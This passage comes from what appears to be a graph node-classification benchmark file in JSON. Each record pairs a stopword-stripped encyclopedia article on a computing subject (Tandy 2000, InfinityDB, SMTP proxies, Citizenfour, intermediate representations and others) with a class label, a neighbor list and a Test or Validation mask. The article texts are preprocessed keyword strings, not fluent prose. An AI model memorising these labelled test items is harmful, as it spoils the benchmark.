would run tandy 2000 standard practice microsoft expectation time customized version ms-dos would prepared different machine i/o drivers designed hardware model highest version dos tandy corporation released tandy 2000 2.11.03 minor third-party patches fact modified version windows 1.0 able run tandy 2000 ms-dos tandy 2000 resided entirely ram unlike ibm pcs contained bios portion os rom complete ms-dos system bios bdos occupied 53 kb ram means ram required run applications tandy 2000 little greater however tandy 2000 fared better comparison later ibm pc-at required run ms-dos version 3.x order operate 1.2 mb floppy drives hard drive version 3 ms-dos rather larger version 2.x running tandy 2000 also proved advantageous tandy 2000 os resided entirely ram therefore could updated hacked rather less effort microsoft basic interpreter supplied computer highly customized tandy 2000 hardware particularly high-resolution color graphics although ibm produced enhanced graphics adapter little year later october 1984 microsoft basic interpreter would support greater color resolution capabilities 1988 tandy/radio shack produced print advertising featuring bill gates microsoft extolling superior performance tandy 2000 advantageous microsoft development windows 1.0 software packages released tandy 2000 included wordperfect 4.2 wp5.1 could work software patches lotus 1-2-3 ashton-tate framework dbase multimate autocad lumena time arts shareware office programs complete line microsoft language products microsoft released version xenix tandy 2000 used western digital vianet network card distributed tandy better basic tandy 2000 pc used write bbs software tandy 2000 later ported ibm pc radio shack deskmate also used tandy 2000 tandy 1000 micropro wordstar versions 3.3 4.0 would run tandy 2000 provided user ran winstall installation utility prompted type video display used selected rom bios would result functional installation none t2000 special features would operative except increased speed version lotus 1-2-3 offered tandy 2000 release 1a customized take advantage unique hardware computer including full 768k ram high resolution color graphics two extra function keys release 1a executable code 60 kb smaller later release 2 provided greater macro programming facilities extra space data additional 128 kb ram available fully expanded tandy 2000 made possible construct larger worksheets later pcs running release 2 advent machines expanded memory nearly two years following introduction tandy 2000 top performer processing large models lotus 1-2-3 tandy 2000 720 kb floppy drives distinct advantage running lotus large enough store even largest worksheets single diskette stark contrast ibm pc xt 360 kb floppy disks order store largest worksheets pc user would split save two disks—and 'd recombine memory later although xt hard drive could store large lotus worksheets single file user could rely single storage device permanent storage important data files 'd forced segment worksheets storage separate disks tandy 2000 large-capacity floppy disks made backup maintenance relatively effortless tandy dropped support tandy 2000 group users formed tandy 2000 orphans software reviews software hardware hacks shareware/freeware repository discovered amateur programmers many commercial ms-dos applications needed minor modifications function tandy 2000 unique hardware also bbs based texas extensive library compatible software available download neither bbs web-based descendant active today",
    "neighbors": [
      11008,
      6787,
      4614,
      5384,
      9363,
      5756,
      1324,
      7983,
      1202,
      563,
      2745,
      7495,
      9166,
      3557,
      7269,
      2159,
      1776,
      6129,
      3323,
      9212
    ],
    "mask": "Test"
  },
  {
    "node_id": 10693,
    "label": 1,
    "text": "InfinityDB:infinitydb infinitydb all-java embedded database engine client/server dbms extended java.util.concurrent.concurrentnavigablemap interface subinterface java.util.map deployed handheld devices servers workstations distributed settings design based proprietary lockless concurrent b-tree architecture enables client programmers reach high levels performance without risk failures new client/server version 5.0 alpha testing wrapping established embedded version provide shared access via secure remote server embedded system data stored retrieved single embedded database file using infnitydb api allows direct access variable length item spaces database client programmers construct traditional relations well specialized models directly satisfy needs dependent application limit number items database size jvm size infinitydb function smallest environment provides random access storage scaled large settings traditional relations specialized models directed database file infinitydb optimized standard relations well types data allowing client applications perform minimum one million operations per second virtual 8-core system airconcurrentmap in-memory map implements java concurrentmap interface internally uses multi-core design performance memory make fastest java map ordering performed holds medium large numbers entries airconcurrentmap iteration faster java map iterators regardless specific map type infinitydb accessed extended standard java.util.concurrent.concurrentnavigablemap via low-level 'itemspace api concurrentnavigablemap interface subinterface java.util.map special ordering concurrency methods api java.util.concurrent.concurrentskiplistmap maps may nested form complex structures maps standard semantics work internally 'tuple space maps actually stored helpers representing nothing immutable tuple prefix maps may created dynamically high speed needed access thread-safe multi-core concurrent key value types available include java primitive data types dates strings small char byte arrays 'bytestrings 'huge array indexes character long objects binary long objects plus special-purpose types 'entityclass 'attribute maps may multi-valued applications may choose use map-based access alone may mix lower-level 'itemspace access tuples map access wrapper tuple-level distinction 12 primitive data types called 'components atomic components concatenated short composites called 'items unit storage retrieval higher-level structures combine items client-devised include example unlimited size records unlimited number columns attributes complex attribute values unlimited size keys may composition components attribute values ordered sets composite components character large objects clob binary large objects blob unlimited sparse arrays higher-level structures built multiple items include key/value associations like ordered maps ordered sets entity-attribute-value nets quadruples trees dag taxonomies full-text indexes mixtures occur along custom client-defined structures itemspace may represented extended json document json printers parsers provided json documents native mapped sets items desired scale determined item prefix represents path sub-document hence entire database subtree single value represented extended json items always kept sorted json keys object always order 'itemspace represents entire database simple ordered set items state item actually stored component encoded variable-length binary form char array components self-describing standard format sorts correctly programmers deal components primitives stored data strongly typed data stored text parsed weak typing json xml parsed programmer-defined binary stream representations custom client-devised binary formats grow brittle security documentation upgrade testing versioning scaling debugging problems case java object serialization access system via basic methods store retrieve order one variable-length 'item 'tuple time speed order 1m operations/second aggregated multiple threads memory operations either standard map api codice_1 codice_2 iterators lower level codice_3 codice_4 codice_5 codice_6 codice_7 codice_8 codice_9 typical items 30 bytes uncompressed memory lob example use 1 kb items operation affects one item small data structures fast access contrast chunked access example formatting parsing entire json xml texts entire java object serialization graphs space performance scaling itemspace smooth size client-imposed multi-item structure created grows shrinks disappears on-storage performance like block-oriented b-tree blocks 4 kb log n per access block cache 2.5 mb default unlimited size often 100 mb cache grows needed performance efficiency items stored inside single b-tree prefix-compressed variable length uninterpreted sequence bytes compression b-tree may typically grow 100 gb range limits one file log files write flush infinitydb minimizes size database file four types compression prefix suffix zlib utf-8 schema upgrade structures extended modified done adding removing items new ways runtime upgrade scripts hence data model nosql schemaless besides normal java primitive types 'entityclass 'attribute types identified name number optional 'metadata mixed components item used represent tables example table given particular entityclass near front item column given different attribute items table start particular entityclass therehe one normal primitives representing 'entity like key particular attribute corresponding column finally normal primitives representing value attribute simple pattern extended time allow nested tables inside attribute nested attributes inside attributes multi-valued attributes much fixed schema elsewhere new data arrives system describes item-level granularity entityclass attribute numbers names represented extended json data displayed web-based client/server database browser viewed manipulated transferred list sorted formatted items json documents nestable tables whose visible structure determined entityclass attributes mixed items dynamic loose flexibility json formality tables combined global 'acd per-thread 'acid transactions provided infinitydb instance stores data single database file require additional log rollback files event catastrophe except power failure hardware malfunction database guaranteed consistent status completion last global commit recovery abrupt termination immediate requires slow log replay bulk loading globally transactional unlimited data size concurrent uses global transactions provide inter-thread isolation semantics 'acd rather 'acid alternatively acid transactions employ optimistic locking allow inter-thread isolation data structures grow shrink freed space reclaimed immediately made available structures systems run indefinitely without gradual space leaks long interruptions garbage reclamation phases data structure becomes empty space recycled rather leaving behind 'tombstones place holders example possibly large multi-value attribute may shrink one value becoming efficient single-valued attribute last value deleted space reclaimed including space attribute attached row attributes values row reclaimed completely well table loses rows space table reclaimed size type data structure property reference counters hence type graph incrementally collected automatically infinitydb client/server alpha-testing state features infinitydb encrypted version 5 beta-testing state features infinitydb embedded version 4 features airconcurrentmap java concurrentnavigablemap implementation features infinitydb airconcurrentmap roger l. deran designed developed infinity database engine 20 years ago holds us patent 5283894 infinity database engine first deployed intel 8088 assembly language roscor sports video editor rsve licensed nfl teams 1980s lexicon purchased rsve 1989 greatly expanded deployment types professional college sports java version 2.0 added transactionality version 3.0 added concurrency features patent pending apply infinitydb well airconcurrentmap infinity db remains active use thousands sites various kinds airconcurrentmap new uses all-java infinitydb marketed boiler bay inc. since 2002 include",
    "neighbors": [
      8291,
      10921,
      5677,
      4781,
      1136,
      5872,
      6770,
      1594,
      479
    ],
    "mask": "Test"
  },
  {
    "node_id": 10694,
    "label": 2,
    "text": "Lycoris_(company):lycoris company lycoris formerly redmond linux corp. started year 2000 intent make free software easy enough anyone use redmond linux founded joseph cheek entrepreneur previously worked linuxcare late 2001 merged embedded systems company deeplinux merged entity named redmond linux corporation company first product redmond linux personal easy-to-use linux desktop operating system company renamed lycoris january 2002 assets acquired mandriva june 15 2005 flagship product lycoris lycoris desktop/lx linux distribution company based maple valley washington usa lycoris currently part mandriva lycoris desktop/lx installer originally based caldera international openlinux workstation 3.1 distribution rest distribution built kernel desktop applications looked lot like microsoft windows xp right background image shipped software",
    "neighbors": [
      8837,
      7435,
      10127,
      2321,
      4887,
      10394,
      673,
      3745,
      10530,
      9253,
      10149,
      3369,
      11305,
      7854,
      2738,
      4790,
      823,
      439,
      56,
      59,
      3903,
      4673,
      2375,
      4039,
      8907,
      10192,
      1110,
      9693,
      2914,
      485,
      3685,
      9064,
      4841,
      6890,
      7913,
      7020,
      10860,
      7534,
      2671,
      7920,
      8177,
      9074,
      9461,
      6393,
      11388,
      8957,
      2559
    ],
    "mask": "None"
  },
  {
    "node_id": 10695,
    "label": 3,
    "text": "Track_&_Field_(video_game):track amp field video game track field known japan europe olympic-themed sports arcade game developed konami released 1983 japanese release sported official license 1984 summer olympics players compete series events involving alternately pressing two buttons quickly possible make onscreen character run faster followed sequel hyper sports original arcade game player uses two run buttons trackball later units replaced buttons damaged overuse one action button control athlete competing following six events event qualifying time level player must achieve advance next event failing qualify one heat running events three tries events reduce player number lives one none present his/her disposal game end players earn extra lives per 100,000 points scored game accommodate four players compete pairs running events individually others fewer four players remaining slots played computer player cpu multiplayer heats though relative performance players effect game advancing based solely qualifying times multiplayer arcade games set controls relative players going left right game two sets controls somewhat different setup left set controls players 2 4 right set players 1 3 one classic arcade games single player mode played right set controls rather left player completes six events brief medal ceremony sent back field another round higher qualifying levels however game configured conclude final event game responded repeatedly pressing run buttons high frequency players arcade version resorted various tricks rapidly swiping coin ping-pong ball buttons using metal ruler repeated struck would vibrate press buttons result arcade operators reported high rates damage buttons later versions modifications prevent actions game sold 38,000 arcade hardware units japan end 1983 also hit north america 1996 next generation listed track field series collectively number 78 top 100 games time remarking ok games play style little skill even knowledge actual sports test pure button pushing endurance nothing beat track field especially play four players allgame gave game three stars five calling physically exhausting game invented new genre addition challenging events pure originality track field offers nice cartoonish graphics rich colors smooth animation terrific rendition theme chariots fire konami continued releasing games series follow-up hyper sports seven events 100-meter freestyle skeet shooting vault archery triple jump weight lifting pole vault track field initially ported atari inc. atari 2600 console atari 8-bit computers atarisoft label also apple ii commodore 64 port atari 5200 identical atari 8-bit computer version developed 1984 cancelled zx spectrum amstrad cpc versions released part game set match ii compilation 1988 poorly regarded fans konami ported track field famicom hyper olympic included four six events afterwards converted hyper sports famicom well time including three hyper sports events one event track field time nes gained popularity united states konami retooled game release america including eight events games one cartridge original six events track field hammer throw missing place however skeet shooting archery triple jump nes version track field re-released europe 1992 track field barcelona kemco light 1992 summer olympics opening song nes version chariots fire theme vangelis also used arcade version high score screen game boy version also re-released part konami gb collection series xbox live arcade version game released xbox 360 august 8 2007 features updated graphics sounds leaderboards online play xbox live service game also appears nintendo ds altered version chariots fire theme december 18 2008 héctor rodriguez california usa scored world record 95,350 points rodriguez beat 23-year-old record 95,040 points set june 30 1985 kelly kobashigawa los angeles twin galaxies 1985 video game masters tournament victoria british columbia canada twin galaxies official video game pinball book world records arcade volume lists history largest video game contest 1984 march dimes international konami/centuri track field challenge editors say 1 million contestants played track field april 30 may 26 hoping among three finalists going japan represent usa fundraiser march dimes event held aladdin castle arcades national convenience stores gary west oklahoma city u.s. finals phil britt riverside california world championship tokyo june 10 1984",
    "neighbors": [
      4357,
      9957,
      6923,
      4524,
      9006,
      10576,
      6449,
      498,
      10931,
      8887
    ],
    "mask": "Test"
  },
  {
    "node_id": 10696,
    "label": 4,
    "text": "SMTP_proxy:smtp proxy smtp proxies specialized mail transfer agents mtas similar types proxy servers pass smtp sessions mtas without using store-and-forward approach typical mta smtp proxy receives connection initiates another smtp session destination mta errors status information destination mta passed back sending mta proxy smtp proxies commonly used process filter inbound outbound email traffic smtp proxies often serve initial network-facing layer email system processing smtp connections clients forwarding data second layer mail servers smtp proxies often implement first and/or layer defence inbound anti-spam filtering system analyze messages using spam content filter antivirus program block rate limit connections using dns blacklists reputation system load balance smtp connections prevent overloading mail servers smtp proxies store messages like mail transfer agent mta reject smtp connections message content real-time away need out-of-band non delivery reports ndrs cause backscatter email serious problem internet email system certain smtp proxies implement tcp connection management otherwise known flow control help reduce damage downstream mail servers resulting spikes tcp traffic malicious smtp clients tcp connection management context smtp typically involves bandwidth throttling and/or introducing delays smtp command responses also known tarpitting slowed certain malicious sources smtp traffic spam bots tend give rather continuing deliver full email message network tarpitting challenging implement within email server since smtp connection processed slowly normal often holding precious system resources memory cpu smtp proxies implemented using lighter-weight programming techniques asynchronous io example nginx node.js netty libevent thousands connections juggled using resources much smaller number connections context full-blown store forward email server smtp proxies sometimes inserted sending mail servers local network receiving counterparts internet smtp proxies often used context order filter outgoing spam however applications domain keys identified mail dkim signing also exist smtp proxies come fundamental flavors",
    "neighbors": [
      8224,
      9824,
      2213,
      3237,
      6246,
      6762,
      8202,
      10924,
      4272,
      10167,
      2994,
      7764,
      4725,
      4918,
      9588,
      9909,
      9053
    ],
    "mask": "Test"
  },
  {
    "node_id": 10697,
    "label": 4,
    "text": "Citizenfour:citizenfour citizenfour 2014 documentary film directed laura poitras concerning edward snowden nsa spying scandal film us premiere october 10 2014 new york film festival uk premiere october 17 2014 bfi london film festival film features snowden glenn greenwald co-produced poitras mathilde bonnefoy dirk wilutzky steven soderbergh others serving executive producers citizenfour received critical acclaim upon release recipient numerous accolades including academy award best documentary feature 2015 oscars january 2013 laura poitras american documentary film director/producer working several years film monitoring programs united states result september 11 attacks receives encrypted e-mail stranger calls citizenfour offers inside information illegal wiretapping practices us national security agency nsa intelligence agencies june 2013 accompanied investigative journalist glenn greenwald guardian intelligence reporter ewen macaskill travels hong kong camera first meeting stranger hotel reveals edward snowden scenes meeting take place snowden hotel room maintains privacy shots snowden bed front mirror hotel distance form character snowden trapped political agent four days interviews june 9 snowden identity made public request media outlets begin discover location mira hong kong snowden relocates poitras room attempt elude phone calls made room facing potential extradition prosecution united states snowden schedules meeting united nations high commissioner refugees applies refugee status poitras believes followed leaves hong kong berlin june 21 us government requests hong kong government extradite snowden snowden manages depart hong kong us passport cancelled connect havana stranding sheremetyevo international airport moscow august 1 2013 russian government grants snowden temporary asylum period one year meanwhile greenwald returns home rio de janeiro speaks publicly united states utilization nsa programs foreign surveillance greenwald poitras maintain correspondence wherein express reluctance return united states throughout film offers smaller vignettes precede follow snowden hong kong interviews including william binney speaking nsa programs eventually testifying german parliament regarding nsa spying germany film closes greenwald snowden poitras meeting time russia greenwald snowden discuss new emerging details us intelligence programs careful write speak critical pieces information greenwald tears documents creating pile scraps slowly removing table born june 21 1983 elizabeth city north carolina edward snowden first became involved united states government upon enrollment army reserves spring 2004 snowden claims left program months broke legs training accident us house representatives report claims shin splints began working cia 2006 stationed diplomatic cover agency geneva switzerland 2007 nearly three years agency snowden resigned position february 2009 order begin working contractor nsa point career snowden could sense views changing watched obama advanced policies thought would reigned ... nsa intent making every conversation every form behaviour world known 2012 snowden reassigned base japan base honolulu hawaii working variety different contractors serving consultant booz allen hamilton words longer continued work nsa worked secret resist feelings regarding various programs place agency served hawaiian base approximately 15 months prior leaving united states leaking thousands classified documents 2012 poitras begun work third film 9/11 trilogy country country 2006 oath 2010 intended focus broadly topic domestic surveillance interviewed assange greenwald binney appelbaum first contacted snowden january 2013 unable establish encrypted communications greenwald flew hong kong late may 2013 course eight days filmed snowden hotel room mira hotel hong kong later traveled moscow filmed second interview snowden conducted greenwald production company praxis films involved production documentary film distributed radius twc us britdoc foundation artificial eye uk piffl media germany broadcast rights television obtained channel 4 united kingdom hbo documentary films usa norddeutscher rundfunk germany international film premiere took place october 10 2014 united states new york film festival europe documentary shown first time october 17 bfi london film festival first showing germany october 27 part leipzig film festival director laura poitras present hamburg abaton cinema preview november 4–5 official germany premiere kino international german cinemas film running since november 6 widest release 105 theaters weekend december 12–18 2014 premiered home box office february 23 2015 day 87th academy awards subsequently released streaming hbo go channel 4 broadcast united kingdom february 25 2015 released view-on-demand march 4 2015 citizenfour received widespread critical acclaim approval rating 96 rotten tomatoes based 144 reviews average score 8.26/10 site critics consensus reads part real-life thriller part sobering examination 21st century civil liberties citizenfour transcends ideology offer riveting must-see cinema metacritic gave film score 88 100 based 38 reviews indicating universal acclaim ronnie scheib variety wrote amount familiarity whistleblower edward snowden shocking revelations u.s. government wholesale spying citizens prepare one impact laura poitras extraordinary documentary citizenfour ... far reconstructing analyzing fait accompli film tersely records deed real time poitras fellow journalist glenn greenwald meet snowden eight-day period hong kong hotel room plot unleash bombshell shook world adapting cold language data encryption recount dramatic saga abuse power justified paranoia poitras brilliantly demonstrates information weapon cuts ways spencer ackerman writes guardian citizenfour must maddening documentary film subject pervasive global surveillance enveloping digital act spreads without visibility scenes unfold courtrooms hearing chambers hotels yet virtuosity laura poitras director architect makes 114 minutes crackle nervous energy revelation time magazine rated film 3 top 10 movies 2014 called film halloween scariest chiller vanity fair rated 4 top 10 grantland rated 3 top 10 writing chicago tribune former defense department intelligence analyst alex lyda penned negative review calling snowden narcissist patriot david edelstein reviewed film mostly favorably jocularly advised viewers n't buy ticket online credit card film site fandor published extensive survey articles reviews citizenfour updated december 25 2014 sept. 18 2018 ruled european court human rights u.k. spy agency bulk collection telecom data violated european convention human rights strasburg-based court ruled 5-2 practice failed safeguard rights privacy guaranteed human rights convention complaint brought ten groups including aclu privacy international amnesty international civil liberties groups around world december 2014 retired naval officer oil executive horace edwards kansas filed suit film producers behalf american people aiding abetting snowden leaks hollywood reporter provided legal analysis noting observers opining edwards may legal standing pursue lawsuit edwards also challenged film oscar eligibility grounds poitras 2013 short film showing greenwald interviewing snowden constituted previous release citizenfour rendering ineligible oscar rules academy rejected claim noting guardian interview appears less two minutes documentary ruled citizenfour eligible oscar consideration february 2015 filmmakers asked u.s. district court district kansas dismiss lawsuit standing jurisdictional grounds first amendment grounds citing bartnicki v. vopper edwards officially dropped case april 3 2015 dok leipzig 2014 citizenfour leipziger ring award edward snowden gave video message festival citizenfour 2015 academy award best documentary feature considered frontrunner heading awards brent lang variety called citizenfour receive nomination academy award best picture thr gregg kilday discussing prospects nominated category poitras also received several journalistic humanitarian awards reporting snowden disclosures depicted film including george polk award greenwald macaskill ridenhour truth-telling prize edward snowden carl von ossietzky medal human rights greenwald snowden henri nannen prize efforts independence press guardian washington post received pulitzer prize public service reporting poitras greenwald macaskill barton gellman poitras took many security precautions related film described military writer peter maass among others moved berlin germany detained repeatedly border controls entering us edited film germany flying directly hong kong snowden footage prevent fbi showing search warrant hard drives film footage kept encrypted drives multiple levels nested protection computer uses reading sensitive documents separated internet air gap greenwald credited complete expert level understanding story like total technical operational safety maass called poitras security skills particularly vital — far journalistic norm — era pervasive government spying quotes snowden stating n wake year disclosure clear unencrypted journalist-source communication unforgivably reckless bonnefoy also discussed encrypted workflow used making film adding conversation particularly confidential 'll move electronics room 'll meet somewhere outside editing room without phones film society lincoln center selects films new york film festival reported poitras changed location initial screening nyff selection committee several times case someone tracking movements committee shown rough cut sensitive material redacted nyff keep movie inclusion festival wraps mid-september kept festival schedules documents could talk openly last-minute inclusion festival main slate unprecedented event nyff tickets screenings sold within hours film ending credits unusually name several free software projects security tools without film would possible programs named include tor tails debian gnu/linux off-the-record messaging gnu privacy guard truecrypt securedrop october 2014 electronic frontier foundation published informational page software credited film november 2015 poitras prominently featured tor fund-raising campaign soundtrack consists portions nine inch nails album ghosts i–iv released creative commons license by-nc-sa 2008",
    "neighbors": [
      2050,
      8356,
      3495,
      6344,
      7887,
      208,
      4595,
      7893,
      2906,
      8574,
      959
    ],
    "mask": "None"
  },
  {
    "node_id": 10698,
    "label": 5,
    "text": "ARPA_Host_Name_Server_Protocol:arpa host name server protocol arpa host name server protocol nameserver obsolete network protocol used translating host name internet address iana transmission control protocol tcp user datagram protocol udp port 42 nameserver port commonly used windows internet name service wins microsoft operating systems nameserver protocol used darpa trivial name server server process called tnamed provided implementations unix support nameserver protocol deprecated may available latest implementations unix operating systems domain name system dns replaced arpa host name server protocol darpa trivial name server",
    "neighbors": [
      9665,
      4423,
      2887,
      6412,
      10924,
      6993,
      4051,
      2996,
      5492,
      11413,
      7806,
      3487
    ],
    "mask": "Test"
  },
  {
    "node_id": 10699,
    "label": 1,
    "text": "Database_engine_tuning_advisor:database engine tuning advisor database engine tuning advisor deta computer software tool microsoft sql server enables database tuning improve performance query tuning indexes creating modifying deleting partition indexes configured enabled online offline tuning",
    "neighbors": [
      10505,
      11030
    ],
    "mask": "Test"
  },
  {
    "node_id": 10700,
    "label": 1,
    "text": "Windows_Azure_Caching:windows azure caching windows azure caching in-memory distributed caching feature designed windows azure applications caching available part windows azure sdk azure managed cache in-role cache services retired microsoft recommended migration azure redis cache windows azure caching allows cloud service host caching windows azure role cache distributed across running instances role therefore amount available memory cache determined number running instances role hosts caching amount physical memory reserved caching instance two deployment topologies caching dedicated topology define worker role dedicated caching means worker role available memory used caching operating overhead following diagram shows caching dedicated topology cloud service shown three roles web1 worker1 cache1 two running instances role example cache distributed across instances dedicated cache1 role dedicated topology advantage scaling caching tier independently role cloud service best caching performance dedicated topology recommended role instances share resources application code services co-located topology use percentage available memory existing web worker roles caching following diagram shows caching co-located topology cloud service two roles web1 worker1 two running instances role example cache distributed across instances web1 role role also hosts web front-end cloud service cache configured use percentage physical memory instance web1 role co-located cache cost-effective way make use existing memory role within cloud service following sections show windows azure caching configuration code examples visual studio caching configured caching tab properties role hosts caching makes underlying changes serviceconfiguration.cscfg file settings determine topology used dedicated co-located number named caches settings roles must configured use caching one way nuget package includes modifying web.config contain properly configured datacacheclients section following example datacacheclients section specifies role hosts caching named “ cacheworker1 ” datacacheclients /datacacheclients note code samples section shown c hosting caching roles datacache class constructor used specify named cache datacacheclient section cache client settings following code shows create named cache namedcache2 using settings datacacheclient section named customclient datacache cache new datacache namedcache2 customclient following method shows use cache object retrieve data cache example user identifier userid key associated user information object code first attempts get user information cache using userid key succeed code retrieves information database query stores returned user data cache next time code run user information returned cache rather database assumes cached data expired evicted datatype getuserdata string userid following method shows update data already cache void updateuserdata string userid datatype data following call removes item cache cache.remove userid windows azure shared caching provides caching managed service unlike co-located dedicated topologies cache hosted windows azure roles single cloud service deployment instead cache provided multitenant service usage quotas service divided tiers range 128 mb 4 gb addition storage capacity tier provides increasing processor network capabilities shared caching provides way multiple cloud services access cache windows azure caching roots on-premises technology appfabric originally released one several windows azure appfabric services appfabric designation windows azure since abandoned many assembly names namespaces apis identical windows azure caching appfabric caching first release caching windows azure april 2011 provided caching managed service windows azure offering called shared caching october 2012 support added hosting caching roles within cloud service deployment called windows azure caching windows azure caching related microsoft caching technologies technologies share similar features assembly name namespace types however differences table describes technologies",
    "neighbors": [
      2401,
      4194,
      10700,
      860
    ],
    "mask": "None"
  },
  {
    "node_id": 10701,
    "label": 7,
    "text": "OpenEMIS:openemis openemis open education management information system emis education management information system education sector main purpose collect analyze report data related management educational activities initially conceived unesco openemis serves response member states ’ need area tools educational strategic planning ‘ open ’ refers software open-source gnu gpl available royalty-free member states unesco openemis initiative launched unesco initiative line unesco effort promote emis address issues access equity quality relevance education subsequent gaps member states providing adequate decision support system since early 2000s keeping education goals adopted dakar 2000 openemis conceived royalty-free software customized meet specific needs implementing countries without conditions restrictions use purpose encouraging country-level capacity development helping countries upgrade local skills managing tool initiative coordinated unesco partnership nonprofit organization npo community systems foundation csf implementation technical support since 2012 openemis suite interrelated software solutions supports data collection survey classroom staffroom management core school integrator analysis visualizer monitoring dashboard analyzer datamanager profiles application designed provide unique standalone features support different information management requirements different levels features could customized integrated existing systems open-source solutions openemis benefits coding contributions larger community openemis initiative utilizes end-user license agreements contributor license agreements ensure maintenance standards quality assurance product remains free commercialization openemis implemented following countries nearly cases ministry education central implementation support engagement wide range stakeholders support available implementing countries aspects country implementation technical support team support activities include services policy planning analysis implementation custom software development training others needed system set may involve cost additional technical support setup configuration migration capacity building",
    "neighbors": [
      8644,
      7980,
      7983
    ],
    "mask": "Test"
  },
  {
    "node_id": 10702,
    "label": 4,
    "text": "Anti-hijack_system:anti-hijack system anti-hijack system electronic system fitted motor vehicles detect criminals hijacking although types systems becoming common newer cars caused decrease insurance premiums widely known common anti-theft systems alarms steering locks also part alarm immobiliser system approved anti-hijacking system achieve safe quick shutdown vehicle attached also mechanical anti-hijack devices company south africa diversify solutions announced research development nelson mandela university gsm based anti hijacking system system works verification process added features alcohol sensors signal jamming capabilities comes incresasing rates hijackings south africa alarming rates accidents caused driving influence texting whilst driving three basic principles systems work lockout system armed driver turns ignition key position carries specified action usually flicking hidden switch depressing brake pedal twice activated vehicle drops certain speed becomes stationary cause vehicles doors automatically lock prevent thieves stealing vehicle stopped example traffic light pedestrian crossing transponder system system always armed device usually small rfid transponder enters vehicle transmitter radius since device carried driver usually wallet pocket driver leaves immediate vicinity vehicle transponder causing system assume vehicle hijacked disable transponder concealed thief would aware system active vehicle ejected driver moved vehicle range driver usually couple meters probably common anti-hijack system central locking system uses concept demonstrated jeremy clarkson old episode bbc top gear program teased butler asking put bags mercedes-benz s600 n't give rfid transponder butler confused s600 doors would n't open tried jeremy approached transponder pocket system acknowledged unlocked car allowing jeremy simply pull door handle gain entry vehicle microswitch system always armed usually activated one vehicle doors opened closed vehicle engine running system activated driver set time limit disarm entering code vehicle takes measures system disarmed time window warn driver sounding vehicle horn every 10 seconds 30 seconds point system start sounding horn much shorter intervals usually activate vehicle hazard lights point immobiliser circuit also start rapidly pulsing 40 seconds completely disabling engine eventually bringing vehicle stop thief switches ignition position back position horn restart operate constantly hazard lights flash 60 seconds immobiliser circuit close 15 seconds rapidly pulse 15 seconds re-opening circuit allowing vehicle driven safe location immobilised hazard lights continue flash every subsequent attempt start vehicle cause horn operate 30 seconds immobilizer circuit open vehicle start hazard lights keep flashing vehicle battery drained system disarmed blocks steering shaft rotation prevent rotation steering wheel set mechanical anti-hijack device wheels turn car travel straight forward backward side back forth installing mechanical anti-hijack device lock wheels turn go car established mechanical anti-hijack device possible information photo mechanicals anti-hijack devices cars",
    "neighbors": [],
    "mask": "None"
  },
  {
    "node_id": 10703,
    "label": 9,
    "text": "Intermediate_representation:intermediate representation intermediate representation ir data structure code used internally compiler virtual machine represent source code ir designed conducive processing optimization translation good ir must accurate – capable representing source code without loss information – independent particular source target language ir may take one several forms in-memory data structure special tuple- stack-based code readable program latter case also called intermediate language canonical example found modern compilers linear human-readable text representing program transformed intermediate graph structure allows flow analysis re-arrangement creating sequence actual cpu instructions use intermediate representation allows compiler systems like gnu compiler collection llvm used many different source languages generate code many different target architectures intermediate language language abstract machine designed aid analysis computer programs term comes use compilers source code program translated form suitable code-improving transformations used generate object machine code target machine design intermediate language typically differs practical machine language three fundamental ways popular format intermediate languages three-address code term also used refer languages used intermediates high-level programming languages output object machine code output intermediate language intermediate language submitted compiler language outputs finished object machine code usually done ease process optimization increase portability using intermediate language compilers many processors operating systems c. languages used fall complexity high-level languages low-level languages assembly languages though explicitly designed intermediate language c nature abstraction assembly ubiquity de facto system language unix-like operating systems made popular intermediate language eiffel sather esterel dialects lisp lush gambit haskell glasgow haskell compiler squeak smalltalk-subset slang cython seed7 systemtap vala others make use c intermediate language variants c designed provide c features portable assembly language including c -- c intermediate language language targeting virtual machine p-code machine considered intermediate language gnu compiler collection gcc uses several intermediate languages internally simplify portability cross-compilation among languages llvm compiler framework based llvm ir intermediate language compact binary serialized representation also referred bitcode productized apple iloc intermediate language used classes compiler design simple target language static analysis tools often use intermediate representation instance radare2 toolbox binary files analysis reverse-engineering uses intermediate languages esil et reil analyze binary files",
    "neighbors": [
      1409,
      4865,
      7173,
      3462,
      4998,
      2440,
      3085,
      3854,
      4112,
      5395,
      11411,
      5397,
      2582,
      10395,
      10012,
      10013,
      7326,
      1952,
      8609,
      5154,
      3876,
      6821,
      7462,
      8868,
      7978,
      10284,
      814,
      5679,
      4656,
      6965,
      9911,
      2105,
      3386,
      2620,
      7486,
      9152,
      5826,
      8644,
      1349,
      8140,
      5837,
      6477,
      7245,
      5074,
      7634,
      11218,
      3413,
      8280,
      7421,
      3034,
      9432,
      477,
      3553,
      482,
      8037,
      5222,
      6502,
      10469,
      1769,
      7273,
      10470,
      1776,
      5872,
      9330,
      2675,
      4980,
      3573,
      8438,
      9331,
      2808,
      9714,
      10097,
      2045
    ],
    "mask": "Test"
  },
  {
    "node_id": 10704,
    "label": 2,
    "text": "KIDO'Z:kido z kidoz content discovery network designed children platform based upon sophisticated coppa compliant machine learning technology platform analyses big data knows recommend relevant content every kid based usage behaviour kidoz offer several solutions stand-alone state-of-the-art child mode app allows children explore world wide web full array mobile tablet devices safely parents may download app free google play store begin empower children explore interests independently safely https //play.google.com/store/apps/details id=com.kidoz password-protected parental control account parents set account parameters features account security enhancement content customisation tools tools addition new content kidoz businesses provides kid developers publishers sdk/js integrate within property begin monetizing safely easily kid-friendly recommendation widget creates engagement users offering free videos games apps discover enjoy advertisers may promote children content network get exposed millions targeted kids enjoy high conversion rates positive brand engagement system designed platform user-generated content content moderated approved moderation team allowed system blocks links scripts attempts lead sites content approved system internally developed around termed smart content engine filters individualizes content users based certain variables age gender languages kidoz came beta testing phase may 2009 v1.0 available 30 languages english german chinese traditional chinese simplified french greek italian japanese korean portuguese russian spanish czech dutch swedish turkish polish kidoz available free download maker website current categories websites videos games children disclosed future freemium versions include additional features premium model offering certain specialized features small monthly fee kidoz kid web environment operating system developed kido z ltd israeli start-up based tel aviv ceo gai havkin kidoz currently follows freemium model application available free download website future versions include additional features e-mail instant messaging closed network revealed next months kido ’ z launch premium package offer additional tools services content",
    "neighbors": [],
    "mask": "Validation"
  },
  {
    "node_id": 10705,
    "label": 4,
